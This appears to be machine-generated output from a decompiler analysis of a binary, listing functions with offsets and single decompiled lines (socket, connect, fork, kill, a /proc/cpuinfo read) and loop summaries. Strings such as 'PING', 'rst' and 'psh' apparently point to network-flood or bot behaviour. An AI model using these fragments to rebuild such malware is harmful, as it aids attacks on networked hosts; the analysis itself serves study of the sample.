    int32_t sock_fd = socket(domain, type, protocol); // 0x40e6d0
        result = sock_fd;
=================FUNCTION : function_40db90 ===================
++++++++ FUNCTION START 49335
++++++++ FUNCTION END 49745
++++++++ FUNCTION LENGTH 410
    while (true) {
    while (true) {
=================FUNCTION : function_4036e8 ===================
++++++++ FUNCTION START 12931
++++++++ FUNCTION END 13374
++++++++ FUNCTION LENGTH 443
    while (true) {
        while (true) {
=================FUNCTION : function_402ce4 ===================
++++++++ FUNCTION START 11358
++++++++ FUNCTION END 11754
++++++++ FUNCTION LENGTH 396
    function_40e3b0(a1, (struct sockaddr *)&v344, 16);
        while (true) {
=================FUNCTION : function_40da34 ===================
++++++++ FUNCTION START 47810
++++++++ FUNCTION END 48249
++++++++ FUNCTION LENGTH 439
    while (true) {
    while (true) {
=================FUNCTION : function_400f68 ===================
++++++++ FUNCTION START 5175
++++++++ FUNCTION END 5719
++++++++ FUNCTION LENGTH 544
    while (true) {
                        while (true) {
=================FUNCTION : function_411dd0 ===================
++++++++ FUNCTION START 84233
++++++++ FUNCTION END 84668
++++++++ FUNCTION LENGTH 435
    while (true) {
        while (true) {
=================FUNCTION : function_40cb70 ===================
++++++++ FUNCTION START 42236
++++++++ FUNCTION END 42654
++++++++ FUNCTION LENGTH 418
        while (true) {
    while (true) {
=================FUNCTION : function_411050 ===================
++++++++ FUNCTION START 79335
++++++++ FUNCTION END 79703
++++++++ FUNCTION LENGTH 368
        case 256: {
        case 2048: {
=================FUNCTION : function_411d94 ===================
++++++++ FUNCTION START 83835
++++++++ FUNCTION END 84230
++++++++ FUNCTION LENGTH 395
    while (true) {
        while (true) {
=================FUNCTION : function_40e4f0 ===================
++++++++ FUNCTION START 56496
++++++++ FUNCTION END 56852
++++++++ FUNCTION LENGTH 356
    int32_t v344 = recv(sock, buf, length, flags); // 0x40e510
    if (flags != 0) {
=================FUNCTION : function_400cd0 ===================
++++++++ FUNCTION START 4736
++++++++ FUNCTION END 5172
++++++++ FUNCTION LENGTH 436
            while (true) {
    while (true) {
=================FUNCTION : function_400a94 ===================
++++++++ FUNCTION START 4281
++++++++ FUNCTION END 4733
++++++++ FUNCTION LENGTH 452
        while (true) {
=================FUNCTION : function_4125a4 ===================
++++++++ FUNCTION START 89033
++++++++ FUNCTION END 89427
++++++++ FUNCTION LENGTH 394
    while (true) {
=================FUNCTION : function_40b830 ===================
++++++++ FUNCTION START 24281
++++++++ FUNCTION END 24638
++++++++ FUNCTION LENGTH 357
    int32_t v344 = getrlimit(resource, rlp); // 0x40b850
=================FUNCTION : function_40ecd0 ===================
++++++++ FUNCTION START 61343
++++++++ FUNCTION END 61740
++++++++ FUNCTION LENGTH 397
    while (true) {
=================FUNCTION : function_40c260 ===================
++++++++ FUNCTION START 32573
++++++++ FUNCTION END 32942
++++++++ FUNCTION LENGTH 369
    while (true) {
=================FUNCTION : function_401e50 ===================
++++++++ FUNCTION START 7786
++++++++ FUNCTION END 8159
++++++++ FUNCTION LENGTH 373
    while (true) {
=================FUNCTION : function_40f42c ===================
++++++++ FUNCTION START 65446
++++++++ FUNCTION END 65844
++++++++ FUNCTION LENGTH 398
    while (true) {
=================FUNCTION : function_40e470 ===================
++++++++ FUNCTION START 56137
++++++++ FUNCTION END 56493
++++++++ FUNCTION LENGTH 356
    int32_t v344 = getsockopt(sock, level, option_name, option_value, NULL); // 0x40e4a8
=================FUNCTION : function_40e280 ===================
++++++++ FUNCTION START 54338
++++++++ FUNCTION END 54705
++++++++ FUNCTION LENGTH 367
    while (true) {
=================FUNCTION : function_4106e0 ===================
++++++++ FUNCTION START 73561
++++++++ FUNCTION END 73918
++++++++ FUNCTION LENGTH 357
    int32_t v344 = getegid(); // 0x410700
=================FUNCTION : function_40e630 ===================
++++++++ FUNCTION START 57573
++++++++ FUNCTION END 57929
++++++++ FUNCTION LENGTH 356
    int32_t v344 = setsockopt(sock, level, option_name, option_value, 0); // 0x40e668
=================FUNCTION : function_40ccc0 ===================
++++++++ FUNCTION START 43014
++++++++ FUNCTION END 43487
++++++++ FUNCTION LENGTH 473
        while (true) {
=================FUNCTION : function_410a90 ===================
++++++++ FUNCTION START 77180
++++++++ FUNCTION END 77629
++++++++ FUNCTION LENGTH 449
        while (true) {
=================FUNCTION : function_410b80 ===================
++++++++ FUNCTION START 77632
++++++++ FUNCTION END 78053
++++++++ FUNCTION LENGTH 421
        while (true) {
=================FUNCTION : function_403020 ===================
++++++++ FUNCTION START 11757
++++++++ FUNCTION END 12132
++++++++ FUNCTION LENGTH 375
    while (true) {
=================FUNCTION : function_403a4c ===================
++++++++ FUNCTION START 13377
++++++++ FUNCTION END 13824
++++++++ FUNCTION LENGTH 447
    while (true) {
=================FUNCTION : function_40b960 ===================
++++++++ FUNCTION START 25361
++++++++ FUNCTION END 25723
++++++++ FUNCTION LENGTH 362
    int32_t fd = open(path, oflag); // 0x40b9a4
=================FUNCTION : function_40e410 ===================
++++++++ FUNCTION START 55777
++++++++ FUNCTION END 56134
++++++++ FUNCTION LENGTH 357
    int32_t v344 = getsockname(sock, addr, (int32_t *)addr_len); // 0x40e430
=================FUNCTION : function_410118 ===================
++++++++ FUNCTION START 71072
++++++++ FUNCTION END 71756
++++++++ FUNCTION LENGTH 684
    while (true) {
=================FUNCTION : function_410620 ===================
++++++++ FUNCTION START 72837
++++++++ FUNCTION END 73194
++++++++ FUNCTION LENGTH 357
    int32_t v344 = sys_clock_getres(a1, a2); // 0x410640
=================FUNCTION : function_400810 ===================
++++++++ FUNCTION START 3548
++++++++ FUNCTION END 3924
++++++++ FUNCTION LENGTH 376
    while (true) {
=================FUNCTION : function_40b7d0 ===================
++++++++ FUNCTION START 23921
++++++++ FUNCTION END 24278
++++++++ FUNCTION LENGTH 357
    int32_t pid = getpid(); // 0x40b7f0
=================FUNCTION : function_40d860 ===================
++++++++ FUNCTION START 46372
++++++++ FUNCTION END 46977
++++++++ FUNCTION LENGTH 605
        while (true) {
=================FUNCTION : function_40e3b0 ===================
++++++++ FUNCTION START 55417
++++++++ FUNCTION END 55774
++++++++ FUNCTION LENGTH 357
    int32_t v344 = connect(sock, addr, addr_len); // 0x40e3d0
=================FUNCTION : function_410740 ===================
++++++++ FUNCTION START 73921
++++++++ FUNCTION END 74278
++++++++ FUNCTION LENGTH 357
    int32_t v344 = geteuid(); // 0x410760
=================FUNCTION : function_40bb40 ===================
++++++++ FUNCTION START 27153
++++++++ FUNCTION END 27524
++++++++ FUNCTION LENGTH 371
    int32_t v344 = sigprocmask(how, set, (struct _TYPEDEF_sigset_t *)oset); // 0x40bb98
=================FUNCTION : function_40b660 ===================
++++++++ FUNCTION START 22486
++++++++ FUNCTION END 22843
++++++++ FUNCTION LENGTH 357
    int32_t v344 = close(fd); // 0x40b680
=================FUNCTION : function_401f74 ===================
++++++++ FUNCTION START 8162
++++++++ FUNCTION END 8529
++++++++ FUNCTION LENGTH 367
    while (true) {
=================FUNCTION : function_410830 ===================
++++++++ FUNCTION START 74991
++++++++ FUNCTION END 75348
++++++++ FUNCTION LENGTH 357
    int32_t v344 = getuid(); // 0x410850
=================FUNCTION : function_40b720 ===================
++++++++ FUNCTION START 23206
++++++++ FUNCTION END 23563
++++++++ FUNCTION LENGTH 357
    int32_t v344 = fork(); // 0x40b740
=================FUNCTION : function_40db30 ===================
++++++++ FUNCTION START 48602
++++++++ FUNCTION END 48970
++++++++ FUNCTION LENGTH 368
    while (true) {
=================FUNCTION : function_40b900 ===================
++++++++ FUNCTION START 25001
++++++++ FUNCTION END 25358
++++++++ FUNCTION LENGTH 357
    int32_t v344 = kill(pid, sig_num); // 0x40b920
=================FUNCTION : function_40cee0 ===================
++++++++ FUNCTION START 43490
++++++++ FUNCTION END 43857
++++++++ FUNCTION LENGTH 367
    while (true) {
=================FUNCTION : function_4026fc ===================
++++++++ FUNCTION START 10188
++++++++ FUNCTION END 10549
++++++++ FUNCTION LENGTH 361
    int32_t v344 = function_40b960("/proc/cpuinfo", 0); // 0x402738
=================FUNCTION : function_4107a0 ===================
++++++++ FUNCTION START 74281
++++++++ FUNCTION END 74638
++++++++ FUNCTION LENGTH 357
    int32_t v344 = getgid(); // 0x4107c0
=================FUNCTION : function_410980 ===================
++++++++ FUNCTION START 76111
++++++++ FUNCTION END 76467
++++++++ FUNCTION LENGTH 356
    int32_t v344 = wait4(pid, status, options, rusage); // 0x4109a0
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
=============================WHILE LOOPS ID : 5 @ function_400f68 ====================================
++++++++ WHILE START : 5527 
++++++++ WHILE FUNCTION : function_400f68 
++++++++ WHILE END : 5710 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 11 @ function_4023f8 ====================================
++++++++ WHILE START : 10101 
++++++++ WHILE FUNCTION : function_4023f8 
++++++++ WHILE END : 10138 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 13 @ function_402944 ====================================
++++++++ WHILE START : 11277 
++++++++ WHILE FUNCTION : function_402944 
++++++++ WHILE END : 11341 
++++++++ INTRESTING INSTRUCTIONS :  
		function_401608(v353, (int32_t)"PING");
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 17 @ function_4034d0 ====================================
++++++++ WHILE START : 12872 
++++++++ WHILE FUNCTION : function_4034d0 
++++++++ WHILE END : 12927 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 18 @ function_4036e8 ====================================
++++++++ WHILE START : 13279 
++++++++ WHILE FUNCTION : function_4036e8 
++++++++ WHILE END : 13371 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 20 @ function_4045ec ====================================
++++++++ WHILE START : 15999 
++++++++ WHILE FUNCTION : function_4045ec 
++++++++ WHILE END : 16325 
++++++++ INTRESTING INSTRUCTIONS :  
		if (function_40e3b0(*v363, (struct sockaddr *)&v345, 16) == -1) {
		while (true) {
=============================WHILE LOOPS ID : 21 @ function_40703c ====================================
++++++++ WHILE START : 17258 
++++++++ WHILE FUNCTION : function_40703c 
++++++++ WHILE END : 17299 
++++++++ INTRESTING INSTRUCTIONS :  
		if (function_40db30(v357, (int32_t)"rst") == 0) {
		if (function_40db30(v357, (int32_t)"psh") == 0) {
=============================WHILE LOOPS ID : 22 @ function_407990 ====================================
++++++++ WHILE START : 17712 
++++++++ WHILE FUNCTION : function_407990 
++++++++ WHILE END : 17845 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		if (function_40e3b0(*v373, (struct sockaddr *)&v347, 16) == -1) {
=============================WHILE LOOPS ID : 23 @ function_4080c4 ====================================
++++++++ WHILE START : 18217 
++++++++ WHILE FUNCTION : function_4080c4 
++++++++ WHILE END : 18344 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		if (function_40e3b0(*v373, (struct sockaddr *)&v347, 16) == -1) {
=============================WHILE LOOPS ID : 30 @ function_40a198 ====================================
++++++++ WHILE START : 20306 
++++++++ WHILE FUNCTION : function_40a198 
++++++++ WHILE END : 20622 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 36 @ function_40c3c4 ====================================
++++++++ WHILE START : 33757 
++++++++ WHILE FUNCTION : function_40c3c4 
++++++++ WHILE END : 41730 
++++++++ INTRESTING INSTRUCTIONS :  
		case 37: {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		case 0: {
		while (true) {
=============================WHILE LOOPS ID : 37 @ function_40c3c4 ====================================
++++++++ WHILE START : 41736 
++++++++ WHILE FUNCTION : function_40c3c4 
++++++++ WHILE END : 42232 
++++++++ INTRESTING INSTRUCTIONS :  
		case 37: {
		while (true) {
		case 0: {
		while (true) {
=============================WHILE LOOPS ID : 42 @ function_40cf4c ====================================
++++++++ WHILE START : 44220 
++++++++ WHILE FUNCTION : function_40cf4c 
++++++++ WHILE END : 45033 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 51 @ function_40dd10 ====================================
++++++++ WHILE START : 50534 
++++++++ WHILE FUNCTION : function_40dd10 
++++++++ WHILE END : 50626 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 53 @ function_40de10 ====================================
++++++++ WHILE START : 51008 
++++++++ WHILE FUNCTION : function_40de10 
++++++++ WHILE END : 51101 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 54 @ function_40df60 ====================================
++++++++ WHILE START : 51800 
++++++++ WHILE FUNCTION : function_40df60 
++++++++ WHILE END : 51877 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 64 @ function_411200 ====================================
++++++++ WHILE START : 80651 
++++++++ WHILE FUNCTION : function_411200 
++++++++ WHILE END : 81525 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 68 @ function_411bb0 ====================================
++++++++ WHILE START : 83021 
++++++++ WHILE FUNCTION : function_411bb0 
++++++++ WHILE END : 83110 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 69 @ function_411d94 ====================================
++++++++ WHILE START : 84187 
++++++++ WHILE FUNCTION : function_411d94 
++++++++ WHILE END : 84229 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 70 @ function_411dd0 ====================================
++++++++ WHILE START : 84586 
++++++++ WHILE FUNCTION : function_411dd0 
++++++++ WHILE END : 84660 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
